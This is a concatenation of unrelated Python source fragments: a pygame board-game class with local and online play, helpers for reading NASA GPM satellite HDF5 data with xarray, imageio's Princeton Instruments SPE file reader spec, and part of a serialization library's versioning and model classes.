self.img_button_giveup = surface_clip(get_surface('button_giveup'), 2, 2, 'col')
for i in range(ROW):
size = CHESS_SIZE[i]
self.img_unopen.append(pygame.transform.scale(img_unopen, (size, size)))
chess_img = pygame.transform.scale(img_chess, (size*6, size*2))
for j in range(ROW):
red_temp = chess_img.subsurface((j*size, 0), (size, size))
blue_temp = chess_img.subsurface((j*size, size), (size, size))
self.img_red_chess[j][i][0] = red_temp
self.img_blue_chess[j][i][0] = blue_temp
self.img_red_chess[j][i][1] = pygame.transform.flip(red_temp, True, False)
self.img_blue_chess[j][i][1] = pygame.transform.flip(blue_temp, True, False)
# 加载字体文件
self.font_time = pygame.font.SysFont("Calibri", 40, True) # 剩余时间所用的字体
self.font_text = pygame.font.SysFont("SimHei", 13, True) # 超时次数所用的字体
self.font_name = pygame.font.SysFont("SimHei", 14, True) # 玩家的名字
self.font_title = pygame.font.SysFont("SimHei", 18, True) # 玩家的称号
def init_game(self, data):
'''
根据模式初始化游戏参数。
本地模式时,使用随机的棋盘和随机的先后手。
网络模式时,使用服务器传来的游戏数据。
'''
if self.local: # 本地对战时本地生成棋子,联网对战时服务器生成棋子
self.load_chess(random_chess())
if not self.my_user:
self.my_user = random_user()
self.your_user = random_user()
self.turn = choice(['red', 'blue'])
self.my_color = self.turn
elif self.online:
self.load_chess(data['chess'])
self.your_user = data['you']
self.turn = data['turn']
self.my_color = data['color']
def load_chess(self, chess):
'''
载入random_chess()传来的棋子信息,联网对战时,
服务器传来的棋子信息也是random_chess()生成的。
'''
for i, j in self.traverse():
color = chess[i][j][0]
level = chess[i][j][1]
if color == 'red':
self.chess[i][j] = Chess(color, (i, j), level, self.img_red_chess, self.chess)
elif color == 'blue':
self.chess[i][j] = Chess(color, (i, j), level, self.img_blue_chess, self.chess)
def init_head(self):
'''
初始化头像框。根据双方的颜色选择头像框,
由于游戏过程中不需要变化,所以直接把用户信息都绘制上去。
需要使用 copy() 方法得到一份副本,否则会影响下一次的游戏。
'''
if self.my_color == 'red':
self.my_head = self.img_red_head.copy()
self.your_head = self.img_blue_head.copy()
else:
self.my_head = self.img_blue_head.copy()
self.your_head = self.img_red_head.copy()
self.draw_head(self.my_head, self.my_user)
self.draw_head(self.your_head, self.your_user)
def draw_head(self, head, user):
'''
将用户信息绘制到头像框上。
'''
title = self.font_title.render(user['title'], True, COLOR['time_text'])
name = self.font_name.render(user['name'], True, (255, 255, 255))
credit = self.font_name.render(str(user['credit']), True, (255, 255, 255))
rect = head.get_rect()
pos = title.get_rect(centerx=rect.centerx)
head.blit(title, (pos.x, 97))
head.blit(name, (85, 134))
head.blit(credit, (85, 159))
def init_button(self):
'''初始化按钮。'''
def ok(button):
self.end = True
uninstall_game()
user = None if self.offline else self.my_user
begin = BeginGame(self.factory, user, self.offline)
install_game(begin)
# 这个按钮是在最后游戏结束显示结果时才会出现的,点击后结束游戏并返回到开始界面。
self.buttons['ok'] = Button(self.screen, (445, 300), self.img_button_ok[0],
'ok', self.img_button_ok[1], ok)
# 开始时不可见
self.buttons['ok'].set_visible(False)
def giveup(button):
if self.online:
data = {'type': 'giveup'}
self.sendata(data)
self.win_game(self.enemy_color)
# 这个按钮是用来认输的,只有游戏超过一定的步数时才可以点击。
self.buttons['giveup'] = Button(self.screen, (427, 580), self.img_button_giveup[1][0],
'giveup', self.img_button_giveup[1][1], giveup)
self.buttons['giveup'].set_click(False)
def win_game(self, color):
'''
color 表示哪一方已经获胜,据此选择合适的结束界面。
如果是网络对战,给服务器发送一个结束游戏的包。
'''
self.wait_end = True
self.buttons['giveup'].set_click(False)
if self.local:
mapcolor = {'red': 0, 'blue': 1, None: 2}
self.img_wait_end = self.img_wait[1][mapcolor[color]]
elif self.online:
if not color:
self.img_wait_end = self.img_wait[0][2]
data = {'type': 'endgame', 'user': None}
elif color != self.my_color:
self.img_wait_end = self.img_wait[0][1]
self.my_user['credit'] -= WIN_CREDIT
self.my_user['title'] = get_title(self.my_user['credit'])
data = {'type': 'endgame', 'user': self.my_user}
elif color == self.my_color:
self.img_wait_end = self.img_wait[0][0]
self.my_user['credit'] += WIN_CREDIT
self.my_user['title'] = get_title(self.my_user['credit'])
data = {'type': 'endgame', 'user': self.my_user}
self.sendata(data)
self.start_wait(self.img_wait_end, self.buttons['ok'])
def update(self):
'''
判断是否游戏结束,并且解析服务器传来的数据。
'''
if self.wait_end:
return
if self.online and self.lose_connection():
self.wait_end = True
self.offline = True
self.start_wait(self.img_wait[0][3], self.buttons['ok'])
return
redleft, blueleft = self.chess_left['red'], self.chess_left['blue']
redtime, bluetime = self.timeout['red'], self.timeout['blue']
# 检测是否有一方棋子全被吃掉
if redleft == 0:
self.win_game('blue')
elif blueleft == 0:
self.win_game('red')
# 检测双方是否都只剩下一个棋子,若是,谁的比较大谁就获胜
elif redleft == 1 and blueleft == 1:
left = {}
for i, j in self.traverse():
chess = self.Chess[i][j]
if chess:
left[chess.color] = chess
if left['red'].eat(left['blue']):
self.win_game('red')
else:
self.win_game('blue')
# 谁超时了 MAX_TIMEOUT 次就算输
if redtime >= MAX_TIMEOUT:
self.win_game('blue')
elif bluetime >= MAX_TIMEOUT:
self.win_game('red')
# MAX_NOEAT 步内没有吃子或者翻开棋子就自动和棋
if self.no_eat >= MAX_NOEAT:
self.win_game(None)
# 至少 MIN_GIVEUP 步以后才能认输
if self.step >= MIN_GIVEUP:
self.buttons['giveup'].set_click(True)
self.parse_data()
def parse_data(self):
'''
解析服务器传来的数据,根据数据进行操作。
'''
if not self.factory or not self.factory.data or self.wait_end:
return
# todo: 加入断线检测。
if self.factory.lost:
pass
datas = self.get_datas()
for data in datas:
typ = data['type']
if typ == 'move':
x, y = data['from'][0], data['from'][1]
self.move_chess(self.chess[x][y], *data['to'])
elif typ == 'open':
x, y = data['from'][0], data['from'][1]
self.open_chess(x, y)
elif typ == 'giveup':
self.win_game(self.my_color)
def update_color(self):
'''
更新棋盘每个格子的颜色。
'''
if self.wait_end:
return
for i, j in self.traverse():
p = [CHESSBOARD[i][j], CHESSBOARD[i+1][j], CHESSBOARD[i+1][j+1], CHESSBOARD[i][j+1]]
if (i+j) % 2 == 0:
self.cb_color[i][j] = COLOR['board_1']
else:
self.cb_color[i][j] = COLOR['board_2']
if self.last_step == (i, j):
self.cb_color[i][j] = COLOR['last_step']
if (i, j) in self.next_list:
self.cb_color[i][j] = COLOR['next']
# 选中的棋子所在的棋盘格
x, y = pygame.mouse.get_pos()
if self.select == (i, j):
self.cb_color[i][j] = COLOR['select']
# 鼠标悬停的棋盘格
elif isInsidePolygon((x, y), p):
self.cb_color[i][j] = COLOR['hover']
def draw_time(self):
'''
绘制双方剩余的时间。
'''
if self.wait_end:
return
time_img = self.img_time.copy()
t = int(time.time() - self.start_time)
if t > MAX_TIME:
self.start_time = time.time()
t = 0
self.timeout[self.turn] += 1
print(self.timeout)
time_left = self.font_time.render(str(MAX_TIME-t), True, pygame.color.Color(self.turn))
rect = time_img.get_rect()
pos = time_left.get_rect(centerx=rect.centerx, bottom=rect.bottom-20)
time_img.blit(time_left, pos)
if self.local:
text = '你已超时 %d 次' % self.timeout[self.turn]
time_pos = TIME_POS[0] if self.turn == 'red' else TIME_POS[1]
elif self.my_color == self.turn:
text = '你已超时 %d 次' % self.timeout[self.turn]
time_pos = TIME_POS[0]
else:
text = '对方已超时 %d 次' % self.timeout[self.turn]
time_pos = TIME_POS[1]
time_text = self.font_text.render(text, True, COLOR['time_text'])
pos = time_text.get_rect(centerx=rect.centerx, top=rect.top+20)
time_img.blit(time_text, pos)
self.screen.blit(time_img, time_pos)
def draw(self):
'''
绘制画面。
'''
# 填充背景
self.update_color()
self.screen.blit(self.img_bg, (0, 0))
# 绘制棋盘的边框
pygame.draw.polygon(self.screen, COLOR['boder'], BODER)
# 绘制头像框
self.screen.blit(self.my_head, (20, 50))
self.screen.blit(self.your_head, (780, 50))
# 绘制剩余时间
self.draw_time()
for i, j in self.traverse():
# 画棋盘
p = [CHESSBOARD[i][j], CHESSBOARD[i+1][j], CHESSBOARD[i+1][j+1], CHESSBOARD[i][j+1]]
pygame.draw.polygon(self.screen, self.cb_color[i][j], p)
# 画棋子
chess = self.chess[i][j]
if chess is None:
continue
if not chess.open:
self.screen.blit(self.img_unopen[i], CHESS_POS[i][j])
else:
chess.draw(self.screen)
self.buttons['giveup'].draw()
def traverse(self):
'''
遍历整个棋盘,返回每个位置(i, j)
'''
for i in range(ROW):
for j in range(ROW):
yield i, j
def find_position(self, x, y):
'''
找到位置 (x, y) 属于哪一个棋盘格。
@(x, y): 像素位置。
@return:棋盘位置(i, j)
'''
for i, j in self.traverse():
p = [CHESSBOARD[i][j], CHESSBOARD[i+1][j], CHESSBOARD[i+1][j+1], CHESSBOARD[i][j+1]]
| |
<gh_stars>0
# MIT License
#
# Copyright (c) 2021 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import xarray
import datetime
import glob
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import scipy.spatial
import matplotlib as mpl
import matplotlib.ticker
import os
import abc
import cartopy.crs as ccrs
import geopy.distance
# Import some support utilities to help with the plots
from AbsoluteGrid import get_HAMP_label, AbsoluteGrid, center_to_edge
"""Investigate HAMP - GPM collocations
This script provides methods for a point-to-point comparison of HAMP
and GPM measurements and products.
This script is just a starting point. It provides functions to handle
the GPM data a bit easier.
The GPM data comes in a lot of different processing levels:
https://gpm.nasa.gov/data/directory
The files are in hdf5 format and use the Group feature a lot. However,
no verbose dimensions are used. To handle those inconvenience features,
helper functions like rename_phony_dims() and several open_*() functions
were written. Those function try to provide a useful xarray interface to
the GPM observations.
The GPM Core satellite:
https://pmm.nasa.gov/gpm/flight-project/core-observatory
"""
def rename_phony_dims(ds):
"""rename phony dims by the given DimensionNames
Scans all variables in ds for the DimensionNames attribute and
use this to decode "phony_dim_<num>" dimensions.
Parameters
----------
ds : {xarray.Dataset, xarray.DataArray}
input dataset
Returns
-------
{xarray.Dataset, xarray.DataArray}
renamed dataset
"""
ds = ds.copy()
for key, var in ds.items():
names = var.DimensionNames.split(",")
ds[key] = var.rename(
{phony_dim: name for phony_dim, name in zip(var.dims, names) if phony_dim.startswith("phony_dim")}
)
if hasattr(ds[key], "CodeMissingValue"):
cmv = ds[key].CodeMissingValue
int_cmv = int(cmv.split(".")[0])
if ds[key].min() == int_cmv:
print(f"Note: Variable `{key}' uses {int_cmv:d} instead if {cmv} as missing value.")
ds[key] = ds[key].where(ds[key] != int_cmv)
return ds
@np.vectorize
def time_converter_ymdhms(year, month, dayOfMonth, hour, minute, second, milliSecond):
"""Convert a time that is given by its individual components to np.datetime64"""
# conversion through datetime is just for convenience and to be sure to get dates right.
return np.datetime64(datetime.datetime(year, month, dayOfMonth, hour, minute, second, milliSecond * 1000))
def open_gmi(filename):
"""xarray.open_dataset wrapper for gmi hdf5"""
ds_S1 = xarray.open_dataset(filename, group="S1")
ds_S2 = xarray.open_dataset(filename, group="S2")
ds_S1 = ds_S1.rename(phony_dim_18="S1_time", phony_dim_19="S1_across", phony_dim_21="S1_frequency")
ds_S2 = ds_S2.rename(phony_dim_40="S2_time", phony_dim_41="S2_across", phony_dim_43="S2_frequency")
ds_S1_ScanTime = xarray.open_dataset(filename, group="S1/ScanTime", decode_times=False, mask_and_scale=False)
ds_S2_ScanTime = xarray.open_dataset(filename, group="S2/ScanTime", decode_times=False, mask_and_scale=False)
assert np.all(ds_S1_ScanTime.MilliSecond.values == ds_S2_ScanTime.MilliSecond.values)
assert np.all(ds_S1_ScanTime.DayOfMonth.values == ds_S2_ScanTime.DayOfMonth.values)
assert np.all(ds_S1_ScanTime.Year.values == ds_S2_ScanTime.Year.values)
datetime64 = time_converter_ymdhms(
ds_S1_ScanTime.Year.values,
ds_S1_ScanTime.Month.values,
ds_S1_ScanTime.DayOfMonth.values,
ds_S1_ScanTime.Hour.values,
ds_S1_ScanTime.Minute.values,
ds_S1_ScanTime.Second.values,
ds_S1_ScanTime.MilliSecond.values,
)
ds = xarray.Dataset()
for key in ds_S1.keys():
ds["S1_" + key] = ds_S1[key]
ds["S2_" + key] = ds_S2[key]
ds["S1_time"] = datetime64
ds["S2_time"] = datetime64
ds["S1_frequency"] = [
"10.65 V",
"10.65 H",
"18.70 V",
"18.70 H",
"23.80 V",
"36.50 V",
"36.50 H",
"89.00 V",
"89.00 H",
] # GHz
ds["S2_frequency"] = ["166.00 V", "166.00 H", "183.31+-3.0 V", "183.31+-7.0 V"] # GHz
ds = transfer_Wband_conical_to_nadir(ds)
return ds
def transfer_Wband_conical_to_nadir(ds):
"""Convert the GMI measurements at 89 GHz to pseudo nadir measurements at 90 GHz
The GMI scans at an earth-incidence-angle of 52.8 degree, while HAMP measures about
straight nadir.
This results in different length of the beam path through the atmosphere.
However, this effect can be compensated for by using an empirical function. The
coefficients of such functions can be found by comparing forward simulations
of the different setup. Such function can than also compensate the little frequency
difference between the HAMP W-band channel at 90 GHz and the GMI channels at 89 GHz
with horizontal and vertical polarizations.
One can use both or just one of the 89 GHz channels to convert it to a nadir-90-GHZ
signal. Of course such conversion has some error, but it is never the less better to
compare the converted GMI measurements with HAMP than the raw measurements.
Here I suppose two conversion functions. One uses H and V, the other only one channel.
There seems to be a definition difference between PAMTRA and GMI what is H and V.
Thus we will apply a "H" correction on "V" measurements in the second correction.
The converted GMI observations are stored in the "89.00 HV" and "89.00 HH" entries.
"""
def fit_HV_pol(x, a, b, c, d, e):
return a + b * x[0] + c * x[0] ** 2 + d * x[1] + e * x[1] ** 2
def fit_mono_pol(x, a, b, c):
return a + b * x + c * x ** 2
param90 = [0.20539126, 3.80749043, -0.00869966, -2.39947559, 0.00718512]
tb = xarray.zeros_like(ds.S1_Tb.sel(S1_frequency=["89.00 H"]))
tb.values = fit_HV_pol(
np.concatenate(
[
[ds.S1_Tb.sel(S1_frequency="89.00 V")], # polarization is defined differently than in PAMTRA
[ds.S1_Tb.sel(S1_frequency="89.00 H")],
]
),
*param90,
)[:, :, np.newaxis]
tb = tb.assign_coords(S1_frequency=["89.00 HV"])
tb_concat = xarray.concat((ds["S1_Tb"], tb), "S1_frequency")
ds = ds.drop("S1_Tb").drop("S1_frequency") # drop variables in order to extend them
ds["S1_Tb"] = tb_concat
param90_V = [5.40000658e02, -3.20591358e00, 8.01888816e-03]
tb = xarray.zeros_like(ds.S1_Tb.sel(S1_frequency=["89.00 H"]))
tb.values = fit_mono_pol(ds.S1_Tb.sel(S1_frequency=["89.00 H"]), *param90_V)
tb = tb.assign_coords(
S1_frequency=["89.00 HH"]
) # polarization is defined differently than in PAMTRA. Therefore we use H channel here with V function
tb_concat = xarray.concat((ds["S1_Tb"], tb), "S1_frequency")
ds = ds.drop("S1_Tb").drop("S1_frequency") # drop variables in order to extend them
ds["S1_Tb"] = tb_concat
return ds
def open_gprof(filename):
"""xarray.open_dataset wrapper for gmi gprof L2A hdf5
GPROF is a precipitation product."""
ds_S1 = xarray.open_dataset(filename, group="S1")
ds_S1 = rename_phony_dims(ds_S1)
ds_S1 = ds_S1.rename(
nscan="S1_time",
npixel="S1_across",
)
ds_S1_ScanTime = xarray.open_dataset(filename, group="S1/ScanTime", decode_times=False, mask_and_scale=False)
datetime64 = time_converter_ymdhms(
ds_S1_ScanTime.Year.values,
ds_S1_ScanTime.Month.values,
ds_S1_ScanTime.DayOfMonth.values,
ds_S1_ScanTime.Hour.values,
ds_S1_ScanTime.Minute.values,
ds_S1_ScanTime.Second.values,
ds_S1_ScanTime.MilliSecond.values,
)
ds = xarray.Dataset()
for key in ds_S1.keys():
ds["S1_" + key] = ds_S1[key]
ds["S1_time"] = datetime64
return ds
def open_dpr_ka(filename):
"""xarray.open_dataset wrapper for dpr Ka-band precipitation radar KaPR hdf5
The GPM radar data is stored in two different groups.
These groups represent two different scan strategies.
Originally these were the "main"-scan (MS) and the "high sensitivity" scan
(HS) which was interlarded between the MS beams. However on May 21, 2018,
JAXA and NASA changed the scanning pattern of the KaPR such that the HS bins
are used to sample the outer swath of the KuPR:
See KaPR_scan_pattern.pdf or https://www.eorc.jaxa.jp/en/news/2020/nw200604.html
However, this means, we have to handle a MS and a HS dataset with its
individual set of coordinates and stuff.
"""
def open_scan(S):
"""opener function to open HS or MS datasets"""
ds = xarray.open_dataset(filename, group=S)
ds = rename_phony_dims(ds)
ds_ScanTime = xarray.open_dataset(filename, group=S + "/ScanTime", decode_times=False, mask_and_scale=False)
datetime64 = time_converter_ymdhms(
ds_ScanTime.Year.values,
ds_ScanTime.Month.values,
ds_ScanTime.DayOfMonth.values,
ds_ScanTime.Hour.values,
ds_ScanTime.Minute.values,
ds_ScanTime.Second.values,
ds_ScanTime.MilliSecond.values,
)
ds_SLV = xarray.open_dataset(filename, group=S + "/SLV")
ds_SLV = rename_phony_dims(ds_SLV)
ds_PRE = xarray.open_dataset(filename, group=S + "/PRE")
ds_PRE = rename_phony_dims(ds_PRE)
ds = ds.merge(ds_SLV)
ds = ds.merge(ds_PRE)
ds = ds.rename(nscan="time")
ds["time"] = datetime64
return ds
ds_HS = open_scan("HS").rename(time="HS_time", nrayHS="HS_across")
ds_MS = open_scan("MS").rename(time="MS_time", nrayMS="MS_across")
assert list(ds_HS.keys()) == list(ds_MS.keys())
ds = xarray.Dataset()
for key in ds_HS.keys():
ds["HS_" + key] = ds_HS[key]
ds["MS_" + key] = ds_MS[key]
ds = ds.rename(nbin="MS_nbin", nbinHS="HS_nbin")
return ds
def open_imerg(filename):
"""Open and serve the IMERG product hdf5 files with xarray"""
ds = xarray.open_dataset(
filename,
group="Grid",
decode_cf=False,
# use_cftime=False
)
assert ds.time.attrs["calendar"] == "julian"
del ds.time.attrs[
"calendar"
] # remove this information as it confuses xarray resulting in an object(cftime.DatetimeJulian) time vector instead of np.datetime64
ds = xarray.decode_cf(ds)
assert ds.dims["time"] == 1
ds = ds.isel(time=0)
Longitude, Latitude = np.meshgrid(ds.lon, ds.lat)
ds["Latitude"] = ("lat", "lon"), Latitude
ds["Latitude"] = ds["Latitude"].transpose(*ds.precipitationCal.dims)
ds["Longitude"] = ("lat", "lon"), Longitude
ds["Longitude"] = ds["Longitude"].transpose(*ds.precipitationCal.dims)
ds["HQobservationTime"] = ds.time + ds["HQobservationTime"]
ds = ds.rename(**{key: "S1_" + key for key in ds.variables.keys()})
| |
# -*- coding: utf-8 -*-
# imageio is distributed under the terms of the (new) BSD License.
""" Read SPE files.
Backend: internal
This plugin supports reading files saved in the Princeton Instruments
SPE file format.
Parameters for reading
----------------------
char_encoding : str
Character encoding used to decode strings in the metadata. Defaults
to "latin1".
check_filesize : bool
The number of frames in the file is stored in the file header. However,
this number may be wrong for certain software. If this is `True`
(default), derive the number of frames also from the file size and
raise a warning if the two values do not match.
sdt_meta : bool
If set to `True` (default), check for special metadata written by the
`SDT-control` software. Does not have an effect for files written by
other software.
Metadata for reading
--------------------
ROIs : list of dict
Regions of interest used for recording images. Each dict has the
"top_left" key containing x and y coordinates of the top left corner,
the "bottom_right" key with x and y coordinates of the bottom right
corner, and the "bin" key with number of binned pixels in x and y
directions.
comments : list of str
The SPE format allows for 5 comment strings of 80 characters each.
controller_version : int
Hardware version
logic_output : int
Definition of output BNC
amp_hi_cap_low_noise : int
Amp switching mode
mode : int
Timing mode
exp_sec : float
Alternative exposure in seconds
date : str
Date string
detector_temp : float
Detector temperature
detector_type : int
CCD / diode array type
st_diode : int
Trigger diode
delay_time : float
Used with async mode
shutter_control : int
Normal, disabled open, or disabled closed
absorb_live : bool
on / off
absorb_mode : int
Reference strip or file
can_do_virtual_chip : bool
True or False whether chip can do virtual chip
threshold_min_live : bool
on / off
threshold_min_val : float
Threshold minimum value
threshold_max_live : bool
on / off
threshold_max_val : float
Threshold maximum value
time_local : str
Experiment local time
time_utc : str
Experiment UTC time
adc_offset : int
ADC offset
adc_rate : int
ADC rate
adc_type : int
ADC type
adc_resolution : int
ADC resolution
adc_bit_adjust : int
ADC bit adjust
gain : int
gain
sw_version : str
Version of software which created this file
spare_4 : bytes
Reserved space
readout_time : float
Experiment readout time
type : str
Controller type
clockspeed_us : float
Vertical clock speed in microseconds
readout_mode : ["full frame", "frame transfer", "kinetics", ""]
Readout mode. Empty string means that this was not set by the
Software.
window_size : int
Window size for Kinetics mode
file_header_ver : float
File header version
chip_size : [int, int]
x and y dimensions of the camera chip
virt_chip_size : [int, int]
Virtual chip x and y dimensions
pre_pixels : [int, int]
Pre pixels in x and y dimensions
post_pixels : [int, int],
Post pixels in x and y dimensions
geometric : list of {"rotate", "reverse", "flip"}
Geometric operations
sdt_major_version : int
(only for files created by SDT-control)
Major version of SDT-control software
sdt_minor_version : int
(only for files created by SDT-control)
Minor version of SDT-control software
sdt_controller_name : str
(only for files created by SDT-control)
Controller name
exposure_time : float
(only for files created by SDT-control)
Exposure time in seconds
color_code : str
(only for files created by SDT-control)
Color channels used
detection_channels : int
(only for files created by SDT-control)
Number of channels
background_subtraction : bool
(only for files created by SDT-control)
Whether background subtraction war turned on
em_active : bool
(only for files created by SDT-control)
Whether EM was turned on
em_gain : int
(only for files created by SDT-control)
EM gain
modulation_active : bool
(only for files created by SDT-control)
Whether laser modulation (“attenuate”) was turned on
pixel_size : float
(only for files created by SDT-control)
Camera pixel size
sequence_type : str
(only for files created by SDT-control)
Type of sequnce (standard, TOCCSL, arbitrary, …)
grid : float
(only for files created by SDT-control)
Sequence time unit (“grid size”) in seconds
n_macro : int
(only for files created by SDT-control)
Number of macro loops
delay_macro : float
(only for files created by SDT-control)
Time between macro loops in seconds
n_mini : int
(only for files created by SDT-control)
Number of mini loops
delay_mini : float
(only for files created by SDT-control)
Time between mini loops in seconds
n_micro : int (only for files created by SDT-control)
Number of micro loops
delay_micro : float (only for files created by SDT-control)
Time between micro loops in seconds
n_subpics : int
(only for files created by SDT-control)
Number of sub-pictures
delay_shutter : float
(only for files created by SDT-control)
Camera shutter delay in seconds
delay_prebleach : float
(only for files created by SDT-control)
Pre-bleach delay in seconds
bleach_time : float
(only for files created by SDT-control)
Bleaching time in seconds
recovery_time : float
(only for files created by SDT-control)
Recovery time in seconds
comment : str
(only for files created by SDT-control)
User-entered comment. This replaces the "comments" field.
datetime : datetime.datetime
(only for files created by SDT-control)
Combines the "date" and "time_local" keys. The latter two plus
"time_utc" are removed.
modulation_script : str
(only for files created by SDT-control)
Laser modulation script. Replaces the "spare_4" key.
"""
from datetime import datetime
import logging
import os
from typing import Any, Callable, Dict, Mapping, Optional, Sequence, Union
import numpy as np
from ..core import Format
logger = logging.getLogger(__name__)
class Spec:
"""SPE file specification data
Tuples of (offset, datatype, count), where offset is the offset in the SPE
file and datatype is the datatype as used in `numpy.fromfile`()
`data_start` is the offset of actual image data.
`dtypes` translates SPE datatypes (0...4) to numpy ones, e. g. dtypes[0]
is dtype("<f") (which is np.float32).
`controllers` maps the `type` metadata to a human readable name
`readout_modes` maps the `readoutMode` metadata to something human readable
although this may not be accurate since there is next to no documentation
to be found.
"""
basic = {
"datatype": (108, "<h"), # dtypes
"xdim": (42, "<H"),
"ydim": (656, "<H"),
"xml_footer_offset": (678, "<Q"),
"NumFrames": (1446, "<i"),
"file_header_ver": (1992, "<f"),
}
metadata = {
# ROI information
"NumROI": (1510, "<h"),
"ROIs": (
1512,
np.dtype(
[
("startx", "<H"),
("endx", "<H"),
("groupx", "<H"),
("starty", "<H"),
("endy", "<H"),
("groupy", "<H"),
]
),
10,
),
# chip-related sizes
"xDimDet": (6, "<H"),
"yDimDet": (18, "<H"),
"VChipXdim": (14, "<h"),
"VChipYdim": (16, "<h"),
# other stuff
"controller_version": (0, "<h"),
"logic_output": (2, "<h"),
"amp_high_cap_low_noise": (4, "<H"), # enum?
"mode": (8, "<h"), # enum?
"exposure_sec": (10, "<f"),
"date": (20, "<10S"),
"detector_temp": (36, "<f"),
"detector_type": (40, "<h"),
"st_diode": (44, "<h"),
"delay_time": (46, "<f"),
# shutter_control: normal, disabled open, disabled closed
# But which one is which?
"shutter_control": (50, "<H"),
"absorb_live": (52, "<h"),
"absorb_mode": (54, "<H"),
"can_do_virtual_chip": (56, "<h"),
"threshold_min_live": (58, "<h"),
"threshold_min_val": (60, "<f"),
"threshold_max_live": (64, "<h"),
"threshold_max_val": (66, "<f"),
"time_local": (172, "<7S"),
"time_utc": (179, "<7S"),
"adc_offset": (188, "<H"),
"adc_rate": (190, "<H"),
"adc_type": (192, "<H"),
"adc_resolution": (194, "<H"),
"adc_bit_adjust": (196, "<H"),
"gain": (198, "<H"),
"comments": (200, "<80S", 5),
"geometric": (600, "<H"), # flags
"sw_version": (688, "<16S"),
"spare_4": (742, "<436S"),
"XPrePixels": (98, "<h"),
"XPostPixels": (100, "<h"),
"YPrePixels": (102, "<h"),
"YPostPixels": (104, "<h"),
"readout_time": (672, "<f"),
"xml_footer_offset": (678, "<Q"),
"type": (704, "<h"), # controllers
"clockspeed_us": (1428, "<f"),
"readout_mode": (1480, "<H"), # readout_modes
"window_size": (1482, "<H"),
"file_header_ver": (1992, "<f"),
}
data_start = 4100
dtypes = {
0: np.dtype(np.float32),
1: np.dtype(np.int32),
2: np.dtype(np.int16),
3: np.dtype(np.uint16),
8: np.dtype(np.uint32),
}
controllers = [
"new120 (Type II)",
"old120 (Type I)",
"ST130",
"ST121",
"ST138",
"DC131 (PentaMax)",
"ST133 (MicroMax/Roper)",
"ST135 (GPIB)",
"VTCCD",
"ST116 (GPIB)",
"OMA3 (GPIB)",
"OMA4",
]
# This was gathered from random places on the internet and own experiments
# with the camera. May not be accurate.
readout_modes = ["full frame", "frame transfer", "kinetics"]
# Do not decode the following metadata keys into strings, but leave them
# as byte arrays
no_decode = ["spare_4"]
class SDTControlSpec:
"""Extract metadata written by the SDT-control software
Some of it is encoded in the comment strings
(see :py:meth:`parse_comments`). Also, date and time are encoded in a
peculiar way (see :py:meth:`get_datetime`). Use :py:meth:`extract_metadata`
to update the metadata dict.
"""
months = {
# Convert SDT-control month strings to month numbers
"Jän": 1,
"Jan": 1,
"Feb": 2,
"Mär": 3,
"Mar": 3,
"Apr": 4,
"Mai": 5,
"May": 5,
"Jun": 6,
"Jul": | |
not changed:
p = deepcopy(p)
p.item_types = item_types
changed = True
elif isinstance(p, serial.properties.Dictionary) and (p.value_types is not None):
value_types = version_properties(p.value_types)
if value_types is not None:
if not changed:
p = deepcopy(p)
p.value_types = value_types
changed = True
if p.types is not None:
types = version_properties(p.types)
if types is not None:
if not changed:
p = deepcopy(p)
p.types = types
return p
if isinstance(data, Model):
im = serial.meta.read(data)
cm = serial.meta.read(type(data))
if isinstance(data, Object):
for n in tuple(im.properties.keys()):
p = im.properties[n]
if version_match(p):
np = version_property(p)
if np is not p:
if im is cm:
im = serial.meta.writable(data)
im.properties[n] = np
else:
if im is cm:
im = serial.meta.writable(data)
del im.properties[n]
v = getattr(data, n)
if v is not None:
raise serial.errors.VersionError(
'%s - the property `%s` is not applicable in %s version %s:\n%s' % (
qualified_name(type(data)),
n,
specification,
version_number,
str(data)
)
)
version(getattr(data, n), specification, version_number)
elif isinstance(data, Dictionary):
if im.value_types:
new_value_types = version_properties(im.value_types)
if new_value_types:
if im is cm:
im = serial.meta.writable(data)
im.value_types = new_value_types
for v in data.values():
version(v, specification, version_number)
elif isinstance(data, Array):
if im.item_types:
new_item_types = version_properties(im.item_types)
if new_item_types:
if im is cm:
im = serial.meta.writable(data)
im.item_types = new_item_types
for v in data:
version(v, specification, version_number)
elif isinstance(data, (collections.Set, collections.Sequence)) and not isinstance(data, (str, bytes)):
# for d in data:
# version(d, specification, version_number)
raise ValueError()
elif isinstance(data, (dict, OrderedDict)):
# for k, v in data.items():
# version(v, specification, version_number)
raise ValueError()
class Model(object):
_format = None # type: Optional[str]
_meta = None # type: Optional[serial.meta.Object]
_hooks = None # type: Optional[serial.hooks.Object]
def __init__(self):
self._format = None # type: Optional[str]
self._meta = None # type: Optional[serial.meta.Meta]
self._hooks = None # type: Optional[serial.hooks.Hooks]
self._url = None # type: Optional[str]
self._xpath = None # type: Optional[str]
self._pointer = None # type: Optional[str]
def __hash__(self):
return id(self)
class Object(Model):
_format = None # type: Optional[str]
_meta = None # type: Optional[serial.meta.Object]
_hooks = None # type: Optional[serial.hooks.Object]
def __init__(
self,
_=None, # type: Optional[Union[str, bytes, dict, typing.Sequence, IO]]
):
self._meta = None # type: Optional[serial.meta.Object]
self._hooks = None # type: Optional[serial.hooks.Object]
self._url = None # type: Optional[str]
self._xpath = None # type: Optional[str]
self._pointer = None # type: Optional[str]
if _ is not None:
if isinstance(_, Object):
m = serial.meta.read(_)
if serial.meta.read(self) is not m:
serial.meta.write(self, deepcopy(m))
h = serial.hooks.read(_)
if serial.hooks.read(self) is not h:
serial.hooks.write(self, deepcopy(h))
for k in m.properties.keys():
try:
setattr(self, k, getattr(_, k))
